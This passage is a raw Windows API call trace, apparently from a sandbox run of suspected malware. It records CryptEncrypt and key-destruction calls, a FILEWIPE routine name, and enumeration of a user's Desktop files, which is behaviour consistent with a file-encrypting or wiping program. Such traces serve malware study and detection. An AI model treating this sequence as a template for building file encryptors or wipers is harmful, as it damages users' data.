(HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e168 [0076.024] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb628 [0076.024] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0076.024] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb488 [0076.024] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0076.024] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb648 [0076.025] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.025] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dea0 [0076.025] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0076.025] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0076.025] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f96a8 [0076.025] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b450 [0076.026] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0076.026] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3d8 [0076.027] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.027] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0076.027] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dea0 [0076.027] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0076.027] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0076.027] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3d8 [0076.027] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.027] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.027] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0076.027] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0076.027] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0076.027] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.027] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e060 [0076.027] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb488 [0076.028] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb648 [0076.028] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6f0 [0076.028] CryptEncrypt (in: hKey=0x6b8af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7c1858*, pdwDataLen=0x61e2d8*=0xe811, dwBufLen=0xe820 | out: pbData=0x7c1858*, pdwDataLen=0x61e2d8*=0xe820) returned 1 [0076.028] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0076.028] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0076.028] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddb0 [0076.028] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e060 [0076.028] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6f0 [0076.028] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0076.028] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5e8 [0076.028] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.028] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0076.028] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1f38 [0076.029] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb578 [0076.029] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.029] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.029] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0076.029] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df40 [0076.029] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0076.029] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0076.029] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dea0 [0076.029] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0076.029] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0076.029] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f96a8 [0076.029] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b450 [0076.029] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acb8 [0076.029] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0076.029] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.029] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0076.029] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.029] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0076.029] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0076.029] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0076.029] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.029] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb578 [0076.029] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df40 [0076.029] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.030] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.030] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb578 [0076.030] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.030] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.030] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0076.030] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0076.030] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0076.030] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0076.030] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.030] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0076.030] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3d8 [0076.030] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.030] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.030] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0076.030] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0076.030] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0076.030] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.030] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.030] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.030] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0076.030] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df40 [0076.030] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0076.030] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0076.034] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.034] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0076.034] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1f38 [0076.034] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0076.035] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.035] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.035] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd10 [0076.035] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0076.035] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0076.040] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.040] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0076.040] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.040] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0076.040] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0076.040] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0076.040] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0076.040] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0076.040] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db80 [0076.040] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0076.041] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb508 [0076.041] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0076.041] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abf8 [0076.041] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0076.041] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.041] PeekMessageW (in: lpMsg=0x61e4b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4b4) returned 0 [0076.041] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0076.041] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0076.041] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.041] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfe8 [0076.041] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0076.041] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0076.041] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0076.041] CryptDestroyKey (hKey=0x6b8af8) returned 1 [0076.043] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4a8 [0076.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0076.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5d8 [0076.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfe8 [0076.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0076.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0076.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0076.044] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0076.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfe0 [0076.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0076.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0076.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0076.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa30 [0076.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb388 [0076.044] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0076.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0076.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc70 [0076.044] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.044] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0076.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0076.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.044] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.044] PeekMessageW (in: lpMsg=0x61e654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e654) returned 0 [0076.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0076.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0076.045] PeekMessageW (in: lpMsg=0x61e654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e654) returned 0 [0076.045] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0076.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0076.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0076.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.045] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.045] PeekMessageW (in: lpMsg=0x61e48c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e48c) returned 0 [0076.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0076.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0076.045] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0076.045] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0076.045] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0076.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0076.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0076.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0076.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0076.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb518 [0076.045] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0076.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0076.045] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0076.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd10 [0076.046] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.046] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0076.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.046] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.046] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0076.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0076.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0076.046] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0076.046] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0076.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb508 [0076.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.046] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.046] PeekMessageW (in: lpMsg=0x61e7ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e7ac) returned 0 [0076.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0076.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4a8 [0076.046] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd10 [0076.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0076.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0076.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb508 [0076.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.046] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.046] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0076.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0076.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4a8 [0076.047] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.047] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0076.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0076.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4a8 [0076.047] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0076.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb508 [0076.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4a8 [0076.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0076.047] CryptReleaseContext (hProv=0x6969c0, dwFlags=0x0) returned 1 [0076.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb538 [0076.047] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.047] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.047] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0076.047] FreeLibrary (hLibModule=0x77710000) returned 1 [0076.047] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.048] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.048] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.048] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.049] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.050] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.050] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0076.050] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.052] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.052] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3", lpFindFileData=0x61e858 | out: lpFindFileData=0x61e858*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3ce02d0, ftCreationTime.dwHighDateTime=0x1d5dba6, ftLastAccessTime.dwLowDateTime=0x59fa3130, 